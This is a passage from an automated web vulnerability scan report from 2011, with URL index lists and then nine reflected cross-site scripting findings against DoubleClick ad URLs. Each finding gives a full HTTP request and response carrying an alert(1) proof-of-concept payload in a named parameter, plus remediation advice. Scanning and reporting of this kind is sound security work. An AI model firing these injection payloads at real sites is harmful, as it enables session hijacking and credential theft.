18.67. http://money.cnn.com/.element/ssi/tools/5.0/bubble.html

18.68. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html

18.69. http://money.cnn.com/fn_adspaces/creatives/2010/4/14/336x260_survey.html

18.70. http://myseofriend.net/myseofriendlog.php

18.71. http://now.eloqua.com/visitor/v200/svrGP.aspx

18.72. http://seg.sharethis.com/getSegment.php

18.73. http://showadsak.pubmatic.com/AdServer/AdServerServlet

18.74. http://svcs.cnn.com/weather/getForecast

18.75. http://uac.advertising.com/wrapper/aceUACping.htm

18.76. http://ui.tudou.com/js/embed/xstorage/index.html

18.77. http://www.ask.com/display.html

18.78. http://www.cnn.com/.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html

18.79. http://www.cnn.com/.element/ssi/www/breaking_news/3.0/banner.html

18.80. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

18.81. http://www.imdb.com/tv/widget/grid

18.82. http://www.tudou.com/

18.83. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

18.84. http://www.wireless.att.com/navservice/navservlet

18.85. http://www.zedo.com/shared/commonHeader.htm

18.86. http://wzus1.ask.com/i/b.html

19. HTML uses unrecognised charset

19.1. http://count36.51yes.com/click.aspx

19.2. http://custom.exoclick.com/xhamster-945x100.php

19.3. http://images.sohu.com/bill/s2011/hailiu/huyi/aili/0815/index.html

19.4. http://lifeng.com/favicon.ico

19.5. http://news.sohu.com/s2011/dajijiamao/

19.6. http://news.soso.com/n.q

19.7. http://v2.tudou.com/tdct/commonadv.html

19.8. http://www.ipraction.cn/

19.9. http://www.sohu.com/

19.10. http://www.soso.com/

19.11. http://www.soso.com/wh.q

20. Content type incorrectly stated

20.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

20.2. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.3. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.4. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.5. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

20.6. http://answers.ask.com/favicon.ico

20.7. http://auto.sohu.com/zhuanti/ten/new_model.js

20.8. http://bes-clck.com/v

20.9. http://clients1.google.com/complete/search

20.10. http://content.pop6.com/banners/aff/35057/120x160/120x160_Dayss.flv

20.11. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_Masami.flv

20.12. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_marry.flv

20.13. http://count36.51yes.com/click.aspx

20.14. http://faxin.soso.com/scripts/gift.js

20.15. http://hs.interpolls.com/cache/lionsgate/conan/300/inter_50.poll

20.16. http://hs.interpolls.com/evt.poll

20.17. http://hs.interpolls.com/imprimage.poll

20.18. http://hs.interpolls.com/ts1.poll

20.19. http://i.cdn.turner.com/money/fn_adspaces/creatives/2009/10/14/352812cnnm_twitter_10.12.09_336x280.gif

20.20. http://ipr.cntv.cn/library/column/2011/07/08/C30796/base.css

20.21. http://js.mail.sohu.com/passport/pi18030.201011300952.js

20.22. http://js.sohu.com/passport/pp18030_31.js

20.23. http://js.tudouui.com/js/page/index/v2/userInfo_11.js

20.24. http://myseofriend.net/myseofriendlog.php

20.25. http://news.soso.com/js/filter_dev.js

20.26. http://news.soso.com/js/img_smartbox.dev.js

20.27. http://now.eloqua.com/visitor/v200/svrGP.aspx

20.28. http://ping.crowdscience.com/ping.js

20.29. http://showadsak.pubmatic.com/AdServer/AdServerServlet

20.30. http://sp.ask.com/sh/i/a14/favicon/favicon.ico

20.31. http://static.youku.com/v1.0.0687/index/js/common.js

20.32. http://static.youku.com/v1.0.0687/index/js/header.js

20.33. http://static.youku.com/v1.0.0687/index/js/playlist.js

20.34. http://static.youku.com/v1.0.0687/index/js/searchprompt.js

20.35. http://static.youku.com/v1.0.0687/topic/js/QIndex.js

20.36. http://v2.tudou.com/tdct/commonadv.html

20.37. http://www.ask.com/favicon.ico

20.38. http://www.cnn.com/cnn_adspaces/3.0/homepage/main/bot1.120x90.ad

20.39. http://www.cnn.com/cnn_adspaces/3.0/homepage/spon2.126x31.ad

20.40. http://www.ipraction.cn/library/column/2011/07/04/C30830/style/base.css

20.41. http://www.sohu.com/upload/js/tuiguang_sohu_full_qq.js

20.42. http://www.sohu.com/upload/style/global1212.css

20.43. http://www.sohu.com/upload/style/layout091102.css

20.44. http://www.sohu.com/upload/style/style110805.css

20.45. http://www.soso.com/wh.q

20.46. http://www.tudou.com/my/tui/getFreshActMsg.html

20.47. http://www.tudou.com/my/tui/getOfficialVuserForSub.html

20.48. http://www.tudou.com/my/tui/multyCheckSub.srv

20.49. http://www.tudou.com/util/tools/www_hd.txt

20.50. http://www.wireless.att.com/cell-phone-service/dwr/interface/DWRRequestManager.js

20.51. http://www.wireless.att.com/cell-phone-service/images/cart/btn_close.gif

20.52. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

20.53. http://www.wireless.att.com/navservice/navservlet

20.54. http://www.youku.com/favicon.ico

21. Content type is not specified

21.1. http://sales.liveperson.net/hc/76226072/

21.2. http://stat.tudou.com/newstat/pv



1. Cross-site scripting (reflected)
There are 122 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, a numeric identifier such as the AdID or FlightID values below should consist only of digits). Input which fails the validation should be rejected, not sanitised.

User input should be encoded at any point where it is copied into application responses, using the encoding appropriate to the output context: HTML-encoding of metacharacters such as < > " ' and = where data lands in HTML, and JavaScript string escaping where data lands inside a script string.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48cae"-alert(1)-"5a8cb21eae7 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=55039148cae"-alert(1)-"5a8cb21eae7&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6291
Date: Mon, 15 Aug 2011 18:49:58 GMT
Expires: Mon, 15 Aug 2011 18:54:58 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed May 18 12:04:34 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/z%3B242851043%3B7-0%3B0%3B64882146%3B3454-728/90%3B42245616/42263403/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=55039148cae"-alert(1)-"5a8cb21eae7&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con1")
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf796'-alert(1)-'d09a3a56651 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391bf796'-alert(1)-'d09a3a56651&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6291
Date: Mon, 15 Aug 2011 18:50:02 GMT
Expires: Mon, 15 Aug 2011 18:55:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed May 18 12:04:52 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/x%3B242851043%3B9-0%3B0%3B64882146%3B3454-728/90%3B42245640/42263427/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391bf796'-alert(1)-'d09a3a56651&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con3\"
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 269a2'-alert(1)-'82e91cf9990 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750269a2'-alert(1)-'82e91cf9990&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Date: Mon, 15 Aug 2011 18:49:53 GMT
Expires: Mon, 15 Aug 2011 18:54:53 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
"http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/o%3B242851043%3B13-0%3B0%3B64882146%3B3454-728/90%3B43222784/43240571/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750269a2'-alert(1)-'82e91cf9990&AdID=550391&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smar
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98719"-alert(1)-"53c96ebe774 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=40275098719"-alert(1)-"53c96ebe774&AdID=550391&TargetID=84260&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Date: Mon, 15 Aug 2011 18:49:48 GMT
Expires: Mon, 15 Aug 2011 18:54:48 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:29 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
"http://ad.doubleclick.net/click%3Bh%3Dv8/3b64/17/83/%2a/y%3B242851043%3B14-0%3B0%3B64882146%3B3454-728/90%3B43222793/43240580/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=40275098719"-alert(1)-"53c96ebe774&AdID=550391&TargetID=84260&Values=1589&Redirect=http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smar
...[SNIP]...

1.5. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e974"-alert(1)-"84a663c2818 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=1e974"-alert(1)-"84a663c2818 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6292
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:50:25 GMT
Expires: Mon, 15 Aug 2011 18:55:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jul 22 13:57:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/83/%2a/o%3B242851043%3B13-0%3B0%3B64882146%3B3454-728/90%3B43222784/43240571/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=1e974"-alert(1)-"84a663c2818http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con2");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.6. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c519d'-alert(1)-'bf4a00d5369 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=c519d'-alert(1)-'bf4a00d5369 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6291
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:50:30 GMT
Expires: Mon, 15 Aug 2011 18:55:30 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed May 18 12:04:52 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
7/83/%2a/x%3B242851043%3B9-0%3B0%3B64882146%3B3454-728/90%3B42245640/42263427/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=1589&Redirect=c519d'-alert(1)-'bf4a00d5369http://www.ibm.com/smarterplanet/us/en/smarter_commerce/overview/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomm-20110516&cr=cnnmoney&ct=usbrb301&cn=smartcomm_con3\">
...[SNIP]...

1.7. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e6d'-alert(1)-'bc7014ab8a7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=8426044e6d'-alert(1)-'bc7014ab8a7&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6050
Date: Mon, 15 Aug 2011 18:50:11 GMT
Expires: Mon, 15 Aug 2011 18:55:11 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 15 11:27:47 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/click%3Bh%3Dv8/3b64/17/83/%2a/i%3B242851043%3B4-0%3B0%3B64882146%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=8426044e6d'-alert(1)-'bc7014ab8a7&Values=1589&Redirect=http://www.ibm.com/innovation/us/leadership/hospitals/index.html?cmp=USBRB&cm=b&csr=agus_itlead-20101213&cr=cnnmoney&ct=USBRB301&cn=capleadhosp\">
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f80b"-alert(1)-"bb197b2837 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=842604f80b"-alert(1)-"bb197b2837&Values=1589&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6216
Date: Mon, 15 Aug 2011 18:50:07 GMT
Expires: Mon, 15 Aug 2011 18:55:07 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 06 11:04:09 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
/click%3Bh%3Dv8/3b64/17/82/%2a/c%3B242851043%3B6-0%3B0%3B64882146%3B3454-728/90%3B41585980/41603767/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=842604f80b"-alert(1)-"bb197b2837&Values=1589&Redirect=http://www.ibm.com/systems/data/flash/smartercomputing/index.html?cmp=usbrb&cm=b&csr=agus_brsmartcomp-20110331&cr=cnnmoney&ct=usbrb301&cn=smartercomputing_flsh");
var fscUrl = u
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N815.cnnmoney/B5583854.30

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23fad'-alert(1)-'b48601feb9b was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N815.cnnmoney/B5583854.30;sz=728x90;click0=http://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158923fad'-alert(1)-'b48601feb9b&Redirect=;ord=ogrife,bhesAocdozRoy? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6050
Date: Mon, 15 Aug 2011 18:50:21 GMT
Expires: Mon, 15 Aug 2011 18:55:21 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 15 11:27:47 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Dv8/3b64/17/83/%2a/i%3B242851043%3B4-0%3B0%3B64882146%3B3454-728/90%3B41064361/41082148/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=402750&AdID=550391&TargetID=84260&Values=158923fad'-alert(1)-'b48601feb9b&Redirect=http://www.ibm.com/innovation/us/leadership/hospitals/index.html?cmp=USBRB&cm=b&csr=agus_itlead-20101213&cr=cnnmoney&ct=USBRB301&cn=capleadhosp\">
...[SNIP]...

